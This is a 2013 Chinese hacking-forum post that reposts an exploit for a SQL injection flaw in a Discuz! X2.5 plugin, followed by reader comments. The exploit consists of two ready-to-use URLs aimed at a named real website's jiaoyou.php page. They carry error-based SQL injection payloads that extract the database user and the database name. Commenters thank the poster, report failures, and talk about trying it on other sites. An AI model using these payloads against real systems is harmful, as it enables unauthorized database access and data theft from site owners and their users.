最新DZ X2.5 0DAY (By saviour) 附EXP

2013-04-17 20:13:40 42 爱绱hack 5834

DZ 插件注入漏洞！
前几天看COG发布但阅读权限得200 （管理员才可以查看）

刚去看了下已经公开了所以我就转过来了
Exp:
http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

类别 Web安全

关于作者

爱绱hack32篇文章618篇回复

爱绱hack

评论42次

要评论？请先登录或注册

22楼

xocoder
2013-4-19 12:37

楼主好人。

回复|@ta|踩(0)|顶(0)
21楼

booker
2013-4-19 10:50

原来是插件

回复|@ta|踩(0)|顶(0)
20楼

lywg
2013-4-19 09:42

表示没成功

回复|@ta|踩(0)|顶(0)
19楼

gmm
2013-4-18 18:08

It is not safe to do this query 表示没成功再试试去

回复|@ta|踩(0)|顶(0)
18楼

dllall
2013-4-18 10:22

谢谢分享了

回复|@ta|踩(0)|顶(0)
17楼

dtf666
2013-4-18 10:18

这个还要进一步地利用吧.

回复|@ta|踩(0)|顶(0)
16楼

小毅
2013-4-18 10:04

nice啊

回复|@ta|踩(0)|顶(0)
15楼

唐门三少
2013-4-18 08:51

插件漏洞，楼主标题党了

回复|@ta|踩(0)|顶(0)
14楼

xiaodi
2013-4-18 08:45

好东西啊收藏

回复|@ta|踩(0)|顶(0)
13楼

妖妖灵
2013-4-18 00:43

No input file specified.

回复|@ta|踩(0)|顶(0)
12楼

鬼哥
2013-4-17 23:59

出现错误：It is not safe to do this query

回复|@ta|踩(0)|顶(0)
11楼

cnryan
2013-4-17 23:47

可惜是插件

回复|@ta|踩(0)|顶(0)
10楼

oboi8
2013-4-17 23:17

楼主好人好人一生平安

回复|@ta|踩(0)|顶(0)
9楼

tzming
2013-4-17 23:16

楼主好人````洞主好人````

回复|@ta|踩(0)|顶(0)
8楼

dabizi
2013-4-17 23:05

找两个站研究下

回复|@ta|踩(0)|顶(0)
7楼

点点123
2013-4-17 22:02

研究下

回复|@ta|踩(0)|顶(0)
6楼

9eek
2013-4-17 22:01

灰常蛋疼。。

回复|@ta|踩(0)|顶(0)
5楼

zafe
2013-4-17 21:51

漏洞好人有好报

回复|@ta|踩(0)|顶(0)
4楼

flytian123
2013-4-17 21:30

噢，我错了，没看语句

回复|@ta|踩(0)|顶(0)
3楼

flytian123
2013-4-17 21:26

无法爆出md5，0DAY？

回复|@ta|踩(0)|顶(0)